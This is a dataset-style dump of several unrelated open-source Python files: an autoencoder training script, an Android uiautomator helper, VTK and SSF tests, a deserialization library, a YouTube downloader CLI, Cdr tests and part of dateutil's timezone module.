max_stars_repo_path (string, 3-269 chars) | max_stars_repo_name (string, 4-119 chars) | max_stars_count (int64, 0-191k) | id (string, 1-7 chars) | content (string, 6-1.05M chars) | score (float64, 0.23-5.13) | int_score (int64, 0-5)
---|---|---|---|---|---|---
analysis/networks/autoencoder/train_eval.py | nriesterer/iccm-neural-bound | 0 | 3300 |
""" Evaluates the training performance of the autoencoder.
"""
import time
import pandas as pd
import numpy as np
import torch
import torch.optim as optim
import torch.nn as nn
import ccobra
import onehot
import autoencoder
# General settings
training_datafile = '../../data/Ragni-train.csv'
test_datafile = '../../data/Ragni-test.csv'
n_epochs = 150
batch_size = 16
net = autoencoder.DenoisingAutoencoder()
criterion = nn.MSELoss()
optimizer = optim.Adam(net.parameters())
def csv_to_tensor(datafile):
profiles = []
response_dicts = []
task_sequences = []
df = pd.read_csv(datafile)
for _, subj_df in df.groupby('id'):
# Obtain the task-response mapping for all syllogisms
response_dict = {}
task_sequence = []
for _, task_series in subj_df.sort_values('sequence').iterrows():
item = ccobra.Item(
task_series['id'], task_series['domain'], task_series['task'],
task_series['response_type'], task_series['choices'], task_series['sequence'])
syllogism = ccobra.syllogistic.Syllogism(item)
response_dict[syllogism.encoded_task] = syllogism.encode_response(
task_series['response'].split(';'))
task_sequence.append(syllogism.encoded_task)
# Convert the task-response mapping to the reasoner profile
profile = []
for task in ccobra.syllogistic.SYLLOGISMS:
profile.append(onehot.onehot_response(response_dict[task]))
profiles.append(profile)
response_dicts.append(response_dict)
task_sequences.append(task_sequence)
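    # Each flattened profile has 576 entries: 64 syllogistic tasks x 9 one-hot response options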
profile_tensor = torch.tensor(profiles).float().view(-1, 576)
return profile_tensor, np.array(response_dicts), np.array(task_sequences)
# Construct the training and test tensors
train_data, train_resp_dicts, train_seqs = csv_to_tensor(training_datafile)
test_data, test_resp_dicts, test_seqs = csv_to_tensor(test_datafile)
def compute_accuracy(data, resp_dicts, seqs):
accs = []
for subj_idx in range(len(data)):
subj_resp_dict = resp_dicts[subj_idx]
subj_seq = seqs[subj_idx]
profile_tensor = torch.zeros((576)).float()
subj_hits = []
for task in subj_seq:
task_idx = ccobra.syllogistic.SYLLOGISMS.index(task)
start = task_idx * 9
end = start + 9
truth = subj_resp_dict[task]
# Query the network for a prediction
prediction_idx = net(profile_tensor)[start:end].argmax()
prediction = ccobra.syllogistic.RESPONSES[prediction_idx]
subj_hits.append(prediction == truth)
# Add the true response to the profile
profile_tensor[start:end] = torch.from_numpy(onehot.onehot_response(truth))
accs.append(subj_hits)
return accs
# Training loop
train_accs = []
test_accs = []
losses = []
for epoch in range(n_epochs):
start_time = time.time()
# Permute the training data
rnd_idxs = np.random.permutation(np.arange(len(train_data)))
train_data = train_data[rnd_idxs]
train_resp_dicts = train_resp_dicts[rnd_idxs]
train_seqs = train_seqs[rnd_idxs]
batch_losses = []
for batch_idx in range(len(train_data) // batch_size):
# Obtain the batch data
start = batch_idx * batch_size
end = start + batch_size
batch_data = train_data[start:end]
input_data = batch_data
# Augment the input data by adding noise
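        # Masking noise: torch.bernoulli on a tensor filled with 0.8 keeps each entry with
        # probability 0.8 and zeroes it otherwise, so roughly 20% of the inputs are dropped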
noise = torch.bernoulli(torch.zeros_like(input_data) + 0.8)
input_data = input_data * noise
# Perform the training
outputs = net(input_data)
loss = criterion(outputs, batch_data)
optimizer.zero_grad()
loss.backward()
optimizer.step()
batch_losses.append(loss.item())
losses.append(np.mean(batch_losses))
# Compute the accuracies for evaluation
net.eval()
# Compute the overall accuracy on the training dataset
train_acc = compute_accuracy(train_data, train_resp_dicts, train_seqs)
test_acc = compute_accuracy(test_data, test_resp_dicts, test_seqs)
    # Diagnostic output
print('Epoch {}/{} ({:.2f}s): {}'.format(
epoch + 1, n_epochs, time.time() - start_time, np.mean(batch_losses)))
print(' train acc: {:.4f} ({:.4f})'.format(np.mean(train_acc), np.std(train_acc)))
print(' test acc : {:.4f} ({:.4f})'.format(np.mean(test_acc), np.std(test_acc)))
    # Store the accuracy results
    train_accs.append(train_acc)
    test_accs.append(test_acc)
    # Switch the network back to training mode before the next epoch
    net.train()
# Write the accuracies to disk
print('Writing the results to disk...')
np.save('train_accs.npy', np.array(train_accs))
np.save('test_accs.npy', np.array(test_accs))
np.save('train_losses.npy', np.array(losses))
| 2.59375 | 3 |
Tools/GAutomator/wpyscripts/uiautomator/uiautomator_manager.py | Aver58/ColaFrameWork | 1 | 3301 | #-*- coding: UTF-8 -*-
"""
Tencent is pleased to support the open source community by making GAutomator available.
Copyright (C) 2016 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
"""
__author__ = 'minhuaxu <EMAIL>'
import time
import os
import logging
from libs.uiauto.uiautomator import AutomatorDevice
from wpyscripts.common.adb_process import AdbTool
logger=logging.getLogger("wetest")
_device_port=9008
_uiautomator_port = os.environ.get("UIAUTOMATOR_PORT","19008")
def _init_uiautomator():
"""
    Initialize uiautomator on the device.
:return:
"""
file_path = os.path.split(os.path.realpath(__file__))[0]
uiautomator_stub_path = os.path.abspath(
os.path.join(file_path, "..","third","libs","uiAutomator","uiautomator-stub.jar"))
adb=AdbTool()
print(adb.cmd_wait("push",uiautomator_stub_path,"/data/local/tmp"))
logger.debug("Start UIAutomator")
uiautomator_process=adb.cmd("shell","uiautomator","runtest","uiautomator-stub.jar","-c","com.github.uiautomatorstub.Stub")
time.sleep(3)
logger.debug("Exit uiautomator")
adb.forward(_uiautomator_port,_device_port)
def _init():
port = os.environ.get("UIAUTOMATORPORT")
if port:
return int(port)
else:
"""
        Local run: initialize UiAutomator.
"""
_init_uiautomator()
return int(_uiautomator_port)
def get_uiautomator():
if get_uiautomator.instance:
return get_uiautomator.instance
else:
port=_init()
get_uiautomator.instance = AutomatorDevice(None, port, os.environ.get("PLATFORM_IP", "127.0.0.1"), None)
return get_uiautomator.instance
get_uiautomator.instance=None
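# Illustrative usage sketch (assumes a connected device/emulator and that the uiautomator
# stub started above is reachable; the selector call follows the standard uiautomator wrapper API):
#   device = get_uiautomator()
#   device(text="OK").click()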
| 2.078125 | 2 |
IMU/VTK-6.2.0/Filters/Core/Testing/Python/TestSynchronizedTemplates3D.py | timkrentz/SunTracker | 0 | 3302 |
#!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
class TestSynchronizedTemplates3D(Testing.vtkTest):
def testAll(self):
reader = vtk.vtkImageReader()
reader.SetDataByteOrderToLittleEndian()
reader.SetDataExtent(0,63,0,63,1,93)
reader.SetDataSpacing(3.2,3.2,1.5)
reader.SetFilePrefix("" + str(VTK_DATA_ROOT) + "/Data/headsq/quarter")
reader.SetDataMask(0x7fff)
# write isosurface to file
#vtkSynchronizedTemplates3D stemp
stemp = vtk.vtkContourFilter()
stemp.SetInputConnection(reader.GetOutputPort())
stemp.SetValue(0,1150)
stemp.GenerateTrianglesOff()
stemp.Update()
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfPoints(),39315)
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfCells(),38380)
stemp.GenerateTrianglesOn()
stemp.Update()
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfPoints(),39315)
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfCells(),78268)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(stemp.GetOutputPort())
mapper.ScalarVisibilityOff()
head = vtk.vtkActor()
head.SetMapper(mapper)
head.GetProperty().SetColor(1,0.7,0.6)
# Create the RenderWindow, Renderer and Interactor
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
#
ren1.AddActor(head)
ren1.SetBackground(1,1,1)
renWin.SetSize(400,400)
ren1.SetBackground(0.5,0.5,0.6)
ren1.GetActiveCamera().SetPosition(99.8847,537.926,15)
ren1.GetActiveCamera().SetFocalPoint(99.8847,109.81,15)
ren1.GetActiveCamera().SetViewAngle(20)
ren1.GetActiveCamera().SetViewUp(0,0,-1)
ren1.ResetCameraClippingRange()
# render the image
#
renWin.Render()
# prevent the tk window from showing up then start the event loop
# --- end of script --
if __name__ == "__main__":
Testing.main([(TestSynchronizedTemplates3D, 'test')])
| 1.921875 | 2 |
deserialize/__init__.py | iAndriy/deserialize | 0 | 3303 | """A module for deserializing data to Python objects."""
# pylint: disable=unidiomatic-typecheck
# pylint: disable=protected-access
# pylint: disable=too-many-branches
# pylint: disable=wildcard-import
import enum
import functools
import typing
from typing import Any, Callable, Dict, List, Optional, Union
from deserialize.conversions import camel_case, pascal_case
from deserialize.decorators import constructed, _call_constructed
from deserialize.decorators import default, _get_default, _has_default
from deserialize.decorators import (
downcast_field,
_get_downcast_field,
downcast_identifier,
_get_downcast_class,
allow_downcast_fallback,
_allows_downcast_fallback,
)
from deserialize.decorators import ignore, _should_ignore
from deserialize.decorators import key, _get_key
from deserialize.decorators import parser, _get_parser
from deserialize.decorators import auto_snake, _uses_auto_snake
from deserialize.decorators import allow_unhandled, _should_allow_unhandled
from deserialize.exceptions import (
DeserializeException,
InvalidBaseTypeException,
NoDefaultSpecifiedException,
UndefinedDowncastException,
UnhandledFieldException,
)
from deserialize.type_checks import *
class RawStorageMode(enum.Enum):
"""The storage mode for the raw data on each object.
If a store mode is set, the data will be stored in the attribute named:
`__deserialize_raw__`
"""
# Do not store the raw data at all
none = "none"
# Only store the data on the root node
root = "root"
# Store on all objects (WARNING: This can use a significant amount of memory)
all = "all"
def child_mode(self) -> "RawStorageMode":
"""Determine the mode for child parsing.
When we move to the next child iteration, we need to change mode
in some cases. For instance, if we only store the root node, then we
need to set all the children to not be stored.
:raises Exception: If we get an unexpected storage mode
:returns: The child raw storage mode
"""
if self == RawStorageMode.none:
return RawStorageMode.none
if self == RawStorageMode.root:
return RawStorageMode.none
if self == RawStorageMode.all:
return RawStorageMode.all
raise DeserializeException(f"Unexpected raw storage mode: {self}")
# pylint: disable=function-redefined
def deserialize(class_reference, data, *, throw_on_unhandled: bool = False, raw_storage_mode: RawStorageMode = RawStorageMode.none): # type: ignore
"""Deserialize data to a Python object."""
if not isinstance(data, dict) and not isinstance(data, list):
raise InvalidBaseTypeException(
"Only lists and dictionaries are supported as base raw data types"
)
if hasattr(class_reference, "__name__"):
name = class_reference.__name__
else:
name = str(class_reference)
return _deserialize(
class_reference,
data,
name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
# pylint: enable=function-redefined
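# Illustrative usage sketch (hypothetical `Point` class; deserialization is driven purely by
# the type hints, as implemented by `_deserialize_dict` below):
#   class Point:
#       x: int
#       y: int
#
#   point = deserialize(Point, {"x": 1, "y": 2})
#   assert point.x == 1 and point.y == 2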
# pylint:disable=too-many-return-statements
def _deserialize(
class_reference, data, debug_name, *, throw_on_unhandled: bool, raw_storage_mode: RawStorageMode
):
"""Deserialize data to a Python object, but allow base types"""
# In here we try and use some "heuristics" to deserialize. We have 2 main
# options to do this. For the first, we can take the expected type and try
# and deserialize the data to that and show any errors. The other option is
# to take the data, and try and determine the types and deserialize that
# way. We do a mix of both.
#
# For example, we check if we have an any type or None type first and return
# early, since we can't deserialize directly to those (since that doesn't
# make any sense). But then later, we can't go for a list directly to a
# type, so we have to go through each item in the data, and iterate.
#
# This produces quite a complex interweaving of operations. The general
# approach I've found to work is to try and do specific type checks first,
# then handle collection data, then any other types afterwards. That's not
# set in stone though.
def finalize(value: Optional[Any]) -> Optional[Any]:
"""Run through any finalization steps before returning the value."""
# Set raw data where applicable
if raw_storage_mode in [RawStorageMode.root, RawStorageMode.all]:
# We can't set attributes on primitive types
if hasattr(value, "__dict__"):
setattr(value, "__deserialize_raw__", data)
return value
if class_reference == Any:
return finalize(data)
# Check if it's None (since things like Union[int, Optional[str]] become
# Union[int, str, None] so we end up iterating against it)
if class_reference == type(None) and data is None:
return finalize(None)
if is_union(class_reference):
valid_types = union_types(class_reference, debug_name)
exceptions = []
for valid_type in valid_types:
try:
return finalize(
_deserialize(
valid_type,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
)
except DeserializeException as ex:
exceptions.append(str(ex))
exception_message = (
f"Cannot deserialize '{type(data)}' to '{class_reference}' for '{debug_name}' ->"
)
for exception in exceptions:
exception_lines = exception.split("\n")
sub_message = f"\n\t* {exception_lines[0]}"
for line in exception_lines[1:]:
sub_message += f"\n\t{line}"
exception_message += sub_message
raise DeserializeException(exception_message)
if isinstance(data, dict):
return finalize(
_deserialize_dict(
class_reference,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
)
if isinstance(data, list):
return finalize(
_deserialize_list(
class_reference,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
)
if not is_typing_type(class_reference) and issubclass(class_reference, enum.Enum):
try:
return finalize(class_reference(data))
# pylint:disable=bare-except
except:
enum_by_name = getattr(class_reference, str(data), None)
if enum_by_name:
return finalize(enum_by_name)
# pylint:enable=bare-except
# This will be handled at the end
pass
# If we still have a type from the typing module, we don't know how to
# handle it
if is_typing_type(class_reference):
# The data should not be None if we have a type that got here. Optionals
# are handled by unions above, so if we are here, it's a non-optional
# type and therefore should not be None.
if data is None:
raise DeserializeException(
f"No value for '{debug_name}'. Expected value of type '{class_reference}'"
)
raise DeserializeException(
f"Unsupported deserialization type: {class_reference} for {debug_name}"
)
# Whatever we have left now is either correct, or invalid
if isinstance(data, class_reference):
return finalize(data)
raise DeserializeException(
f"Cannot deserialize '{type(data)}' to '{class_reference}' for '{debug_name}'"
)
# pylint:enable=too-many-return-statements
def _deserialize_list(
class_reference,
list_data,
debug_name,
*,
throw_on_unhandled: bool,
raw_storage_mode: RawStorageMode,
):
if not isinstance(list_data, list):
raise DeserializeException(
f"Cannot deserialize '{type(list_data)}' as a list for {debug_name}."
)
if not is_list(class_reference):
raise DeserializeException(
f"Cannot deserialize a list to '{class_reference}' for {debug_name}"
)
list_content_type_value = list_content_type(class_reference, debug_name)
output = []
for index, item in enumerate(list_data):
deserialized = _deserialize(
list_content_type_value,
item,
f"{debug_name}[{index}]",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
output.append(deserialized)
return output
def _deserialize_dict(
class_reference, data, debug_name, *, throw_on_unhandled: bool, raw_storage_mode: RawStorageMode
):
"""Deserialize a dictionary to a Python object."""
# Check if we are doing a straightforward dictionary parse first, or if it
# has to be deserialized
    if not isinstance(data, dict):
        raise DeserializeException(
            f"Data was not dict for instance: {class_reference} for {debug_name}"
        )
    remaining_properties = set(data.keys())
if is_dict(class_reference):
if class_reference is dict:
# If types of dictionary entries are not defined, do not deserialize
return data
key_type, value_type = dict_content_types(class_reference, debug_name)
result = {}
for dict_key, dict_value in data.items():
if key_type != Any and not isinstance(dict_key, key_type):
raise DeserializeException(
f"Could not deserialize key {dict_key} to type {key_type} for {debug_name}"
)
result[dict_key] = _deserialize(
value_type,
dict_value,
f"{debug_name}.{dict_key}",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
remaining_properties.remove(dict_key)
if throw_on_unhandled and len(remaining_properties) > 0:
raise UnhandledFieldException(
f"The following field was unhandled: {list(remaining_properties)[0]} for {debug_name}"
)
return result
    # It wasn't a straightforward dictionary, so we are in deserialize mode
class_instance = None
class_reference_downcast_field = _get_downcast_field(class_reference)
if class_reference_downcast_field:
downcast_value = data[class_reference_downcast_field]
new_reference = _get_downcast_class(class_reference, downcast_value)
if new_reference is None:
if _allows_downcast_fallback(class_reference):
return _deserialize(
Dict[Any, Any],
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
raise UndefinedDowncastException(
f"Could not find subclass of {class_reference} with downcast identifier '{downcast_value}' for {debug_name}"
)
class_reference = new_reference
class_instance = class_reference.__new__(class_reference)
handled_fields = set()
hints = typing.get_type_hints(class_reference)
if len(hints) == 0:
raise DeserializeException(
f"Could not deserialize {data} into {class_reference} due to lack of type hints ({debug_name})"
)
for attribute_name, attribute_type in hints.items():
if _should_ignore(class_reference, attribute_name):
continue
property_key = _get_key(class_reference, attribute_name)
parser_function = _get_parser(class_reference, property_key)
if is_classvar(attribute_type):
if property_key in data:
raise DeserializeException(
f"ClassVars cannot be set: {debug_name}.{attribute_name}"
)
continue
if _uses_auto_snake(class_reference) and attribute_name.lower() != attribute_name:
raise DeserializeException(
f"When using auto_snake, all properties must be snake cased. Error on: {debug_name}.{attribute_name}"
)
using_default = False
if property_key in data:
value = data[property_key]
handled_fields.add(property_key)
property_value = parser_function(value)
elif _uses_auto_snake(class_reference) and camel_case(property_key) in data:
value = data[camel_case(property_key)]
handled_fields.add(camel_case(property_key))
property_value = parser_function(value)
elif _uses_auto_snake(class_reference) and pascal_case(property_key) in data:
value = data[pascal_case(property_key)]
handled_fields.add(pascal_case(property_key))
property_value = parser_function(value)
else:
if _has_default(class_reference, attribute_name):
deserialized_value = _get_default(class_reference, attribute_name)
using_default = True
else:
if not is_union(attribute_type) or type(None) not in union_types(
attribute_type, debug_name
):
raise DeserializeException(
f"Unexpected missing value for: {debug_name}.{attribute_name}"
)
property_value = parser_function(None)
if not using_default:
deserialized_value = _deserialize(
attribute_type,
property_value,
f"{debug_name}.{attribute_name}",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
setattr(class_instance, attribute_name, deserialized_value)
unhandled = set(data.keys()) - handled_fields
if throw_on_unhandled and len(unhandled) > 0:
filtered_unhandled = [
key for key in unhandled if not _should_allow_unhandled(class_reference, key)
]
if len(filtered_unhandled) > 0:
raise UnhandledFieldException(
f"Unhandled field: {list(filtered_unhandled)[0]} for {debug_name}"
)
_call_constructed(class_reference, class_instance)
return class_instance
| 2.421875 | 2 |
tests/test_get_set.py | snoopyjc/ssf | 3 | 3304 | from ssf import SSF
ssf = SSF(errors='raise')
def test_get_set_days():
dn = ssf.get_day_names()
assert isinstance(dn, tuple)
assert dn == (('Mon', 'Monday'),
('Tue', 'Tuesday'),
('Wed', 'Wednesday'),
('Thu', 'Thursday'),
('Fri', 'Friday'),
('Sat', 'Saturday'),
('Sun', 'Sunday'))
ssf.set_day_names([['MO', 'MON'],
('TU', 'TUE'), ['WE', 'WED'],
('TH', 'THU'), ['FR', 'FRI'],
('SA', 'SAT'), ['SU', 'SUN']])
assert ssf.format('ddd dddd', '10/3/2020') == 'SA SAT'
assert ssf.format('ddd dddd', '10/4/2020') == 'SU SUN'
assert ssf.format('ddd dddd', '10/5/2020') == 'MO MON'
assert ssf.format('ddd dddd', '10/6/2020') == 'TU TUE'
assert ssf.format('ddd dddd', '10/7/2020') == 'WE WED'
assert ssf.format('ddd dddd', '10/8/2020') == 'TH THU'
assert ssf.format('ddd dddd', '10/9/2020') == 'FR FRI'
try:
ssf.set_day_names(2)
assert False # Failed
except ValueError:
pass
try:
ssf.set_day_names((1, 2, 3, 4, 5, 6, 7))
assert False # Failed
except ValueError:
pass
def test_get_set_months():
mn = ssf.get_month_names()
assert isinstance(mn, tuple)
assert mn == (None, ('J', 'Jan', 'January'), ('F', 'Feb', 'February'), ('M', 'Mar', 'March'),
('A', 'Apr', 'April'), ('M', 'May', 'May'), ('J', 'Jun', 'June'), ('J', 'Jul', 'July'),
('A', 'Aug', 'August'), ('S', 'Sep', 'September'), ('O', 'Oct', 'October'),
('N', 'Nov', 'November'), ('D', 'Dec', 'December'))
ssf.set_month_names(mn[:-1] + (('X', 'DE', 'DEC'),) )
assert ssf.format('mmmmm mmm mmmm', '12/3/2020') == 'X DE DEC'
try:
ssf.set_month_names(2)
assert False # Failed
except ValueError:
pass
try:
ssf.set_month_names((0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12))
assert False # Failed
except ValueError:
pass
def test_get_load_table():
t = ssf.get_table()
assert t[0] == 'General'
assert t[1] == '0'
assert t[14] == 'm/d/yyyy'
assert t[49] == '@'
ssf.load_table({104:'yyyy-mm-dd', 105:'0.0'})
assert ssf.format(104, '10/6/2020') == '2020-10-06'
assert ssf.format(105, 3.4) == '3.4'
assert ssf.load('0') == 1
assert ssf.load('mmm mmmm') == 5 # Will be inserted at 5
assert ssf.load('@') == 49
assert ssf.format(5, '10/6/2020') == 'Oct October'
| 2.625 | 3 |
script.py | devppratik/Youtube-Downloader | 0 | 3305 |
import os
import pyfiglet
from pytube import YouTube, Playlist
file_size = 0
folder_name = ""
# Progress Bar
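# Renders an in-place text bar, e.g.: "Progress: |#####---------------| 25.0% Complete"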
def print_progress_bar(iteration, total, prefix='', suffix='', decimals=1, length=100, fill='#', print_end="\r"):
percent = ("{0:." + str(decimals) + "f}").format(100 *
(iteration / float(total)))
filled_length = int(length * iteration // total)
bar = fill * filled_length + '-' * (length - filled_length)
print(f'\r{prefix} |{bar}| {percent}% {suffix}', end=print_end)
if iteration == total:
print()
# Show Progress Bar
def show_progress_bar(chunk, file_handle, bytes_remaining):
print_progress_bar(file_size - bytes_remaining, file_size, prefix='Progress:', suffix='Complete', length=50)
return
# Get Download Location
def get_download_location():
if os.name == 'nt':
download_location = os.path.join(os.path.expanduser('~'), 'Downloads')
else:
download_location = os.path.join(
os.path.expanduser('~'), 'Downloads')
return download_location
# Get Desired Resolution
def get_resolution(video_url):
yt_obj = YouTube(video_url, on_progress_callback=show_progress_bar)
filters = yt_obj.streams.filter(progressive=True, file_extension='mp4')
print("\nAvailable Resolutions -")
for num, res in enumerate(filters, start=1):
print("\t{}. {}".format(num, str(res.resolution)))
selected_res = int(input('Please enter desired resolution : '))
filters = filters[selected_res - 1]
return filters
# Single Video Download
def download_video():
global file_size
try:
video_url = input('Provide Video Download Link : ')
filters = get_resolution(video_url)
file_size = int(filters.filesize)
download_location = get_download_location()
print("\nDownloading {}".format(str(filters.title)))
filters.download(output_path=download_location)
print("Video Downloaded. Thanks for using!!\nYou can find the video here - {}".format(download_location))
except Exception as e:
print("Some Error occured. Exception message is : ", e)
# Playlist Single Video Download
def download_playlist_video(video_url, res):
global file_size
yt_obj = YouTube(video_url, on_progress_callback=show_progress_bar)
    filters = yt_obj.streams.filter(progressive=True, file_extension='mp4', resolution=res).first()
    if not filters:
        filters = yt_obj.streams.filter(
            progressive=True, file_extension='mp4').first()
    file_size = int(filters.filesize)
print("\nDownloading {}".format(str(filters.title)))
download_location = get_download_location()
filters.download(output_path="{}/{}".format(download_location, folder_name))
print("Download Complete")
# Playlist Download
def download_playlist():
global folder_name
try:
playlist_url = input('Provide Playlist Link : ')
videos_list = Playlist(playlist_url)
folder_name = videos_list.title
resolution = get_resolution(videos_list[0]).resolution
for video in videos_list:
download_playlist_video(video, resolution)
print("All Videos Downloaded. Thanks for Using!!")
except Exception as e:
print("Some Error occurred. Exception message is : ", e)
# Main Function
def main():
ascii_banner = pyfiglet.figlet_format("YT Downloader")
print(ascii_banner)
print("\t By <NAME>\n\n")
choice = int(input(
"""MENU
1.Download Single Video
2.Download Playlist\n
Enter Your Choice : """))
if choice == 1:
download_video()
elif choice == 2:
download_playlist()
else:
print("Wrong Option")
# Start of Program
if __name__ == '__main__':
main()
| 2.921875 | 3 |
test/python/test.py | alex952/cdr | 0 | 3306 | #
# Copyright 2014-2018 Neueda Ltd.
#
from cdr import Cdr
import unittest
field1 = 1
field2 = 2
field3 = 55
class TestCdr(unittest.TestCase):
def get_a_cdr(self):
d = Cdr()
d.setInteger(field1, 123)
d.setString(field2, "Hello")
d.setString(field3, "World")
return d
def test_set_integer(self):
d = self.get_a_cdr()
self.assertEqual(d.getInt32(field1), 123)
def test_set_string(self):
d = self.get_a_cdr()
d.setString(field2, "Hello")
self.assertEqual(d.getString(field2), "Hello")
def test_get_exception(self):
d = self.get_a_cdr()
with self.assertRaises(RuntimeError):
d.getInteger(4)
def test_to_string(self):
d = Cdr()
d.setInteger(field1, 123)
self.assertEqual(d.toString(), "1=123")
def test_str(self):
d = Cdr()
d.setInteger(field1, 123)
def test_nested(self):
d = Cdr()
e = Cdr()
e.setString(1, "hello")
e.setString(2, "world")
d.appendArray(1, e)
f = d.getArray(1)
self.assertEqual(e.getString(1), f[0].getString(1))
self.assertEqual(e.getString(2), f[0].getString(2))
def test_to_python_dict(self):
d = Cdr()
e = Cdr()
f = Cdr()
f[21] = 400
e[11] = 300
e[12] = [f]
d[1] = 100
d[2] = 200
d[3] = [e]
assert(d.toPythonDict()[3][0][12][0][21] == 400)
if __name__ == '__main__':
unittest.main()
| 3.359375 | 3 |
vendor/mo_times/vendor/dateutil/tz.py | klahnakoski/auth0-api | 0 | 3307 |
"""
Copyright (c) 2003-2007 <NAME> <<EMAIL>>
This module offers extensions to the standard Python
datetime module.
"""
import datetime
import os
import struct
import sys
import time
from mo_future import PY3, string_types
__license__ = "Simplified BSD"
__all__ = ["tzutc", "tzoffset", "tzlocal", "tzfile", "tzrange",
"tzstr", "tzical", "tzwin", "tzwinlocal", "gettz"]
relativedelta = None
parser = None
rrule = None
try:
from dateutil.tzwin import tzwin, tzwinlocal
except (ImportError, OSError):
tzwin, tzwinlocal = None, None
def tzname_in_python2(myfunc):
"""Change unicode output into bytestrings in Python 2
tzname() API changed in Python 3. It used to return bytes, but was changed
to unicode strings
"""
def inner_func(*args, **kwargs):
if PY3:
return myfunc(*args, **kwargs)
else:
return myfunc(*args, **kwargs).encode()
return inner_func
ZERO = datetime.timedelta(0)
EPOCHORDINAL = datetime.datetime.utcfromtimestamp(0).toordinal()
class tzutc(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
def dst(self, dt):
return ZERO
@tzname_in_python2
def tzname(self, dt):
return "UTC"
def __eq__(self, other):
return (isinstance(other, tzutc) or
(isinstance(other, tzoffset) and other._offset == ZERO))
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s()" % self.__class__.__name__
__reduce__ = object.__reduce__
class tzoffset(datetime.tzinfo):
def __init__(self, name, offset):
self._name = name
self._offset = datetime.timedelta(seconds=offset)
def utcoffset(self, dt):
return self._offset
def dst(self, dt):
return ZERO
@tzname_in_python2
def tzname(self, dt):
return self._name
def __eq__(self, other):
return (isinstance(other, tzoffset) and
self._offset == other._offset)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(%s, %s)" % (self.__class__.__name__,
repr(self._name),
self._offset.days*86400+self._offset.seconds)
__reduce__ = object.__reduce__
class tzlocal(datetime.tzinfo):
_std_offset = datetime.timedelta(seconds=-time.timezone)
if time.daylight:
_dst_offset = datetime.timedelta(seconds=-time.altzone)
else:
_dst_offset = _std_offset
def utcoffset(self, dt):
if self._isdst(dt):
return self._dst_offset
else:
return self._std_offset
def dst(self, dt):
if self._isdst(dt):
return self._dst_offset-self._std_offset
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
return time.tzname[self._isdst(dt)]
def _isdst(self, dt):
# We can't use mktime here. It is unstable when deciding if
# the hour near to a change is DST or not.
#
# timestamp = time.mktime((dt.year, dt.month, dt.day, dt.hour,
# dt.minute, dt.second, dt.weekday(), 0, -1))
# return time.localtime(timestamp).tm_isdst
#
# The code above yields the following result:
#
#>>> import tz, datetime
#>>> t = tz.tzlocal()
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRDT'
#>>> datetime.datetime(2003,2,16,0,tzinfo=t).tzname()
#'BRST'
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRST'
#>>> datetime.datetime(2003,2,15,22,tzinfo=t).tzname()
#'BRDT'
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRDT'
#
# Here is a more stable implementation:
#
timestamp = ((dt.toordinal() - EPOCHORDINAL) * 86400
+ dt.hour * 3600
+ dt.minute * 60
+ dt.second)
return time.localtime(timestamp+time.timezone).tm_isdst
def __eq__(self, other):
if not isinstance(other, tzlocal):
return False
return (self._std_offset == other._std_offset and
self._dst_offset == other._dst_offset)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s()" % self.__class__.__name__
__reduce__ = object.__reduce__
class _ttinfo(object):
__slots__ = ["offset", "delta", "isdst", "abbr", "isstd", "isgmt"]
def __init__(self):
for attr in self.__slots__:
setattr(self, attr, None)
def __repr__(self):
l = []
for attr in self.__slots__:
value = getattr(self, attr)
if value is not None:
l.append("%s=%s" % (attr, repr(value)))
return "%s(%s)" % (self.__class__.__name__, ", ".join(l))
def __eq__(self, other):
if not isinstance(other, _ttinfo):
return False
return (self.offset == other.offset and
self.delta == other.delta and
self.isdst == other.isdst and
self.abbr == other.abbr and
self.isstd == other.isstd and
self.isgmt == other.isgmt)
def __ne__(self, other):
return not self.__eq__(other)
def __getstate__(self):
state = {}
for name in self.__slots__:
state[name] = getattr(self, name, None)
return state
def __setstate__(self, state):
for name in self.__slots__:
if name in state:
setattr(self, name, state[name])
class tzfile(datetime.tzinfo):
# http://www.twinsun.com/tz/tz-link.htm
# ftp://ftp.iana.org/tz/tz*.tar.gz
def __init__(self, fileobj):
if isinstance(fileobj, string_types):
self._filename = fileobj
fileobj = open(fileobj, 'rb')
elif hasattr(fileobj, "name"):
self._filename = fileobj.name
else:
self._filename = repr(fileobj)
# From tzfile(5):
#
# The time zone information files used by tzset(3)
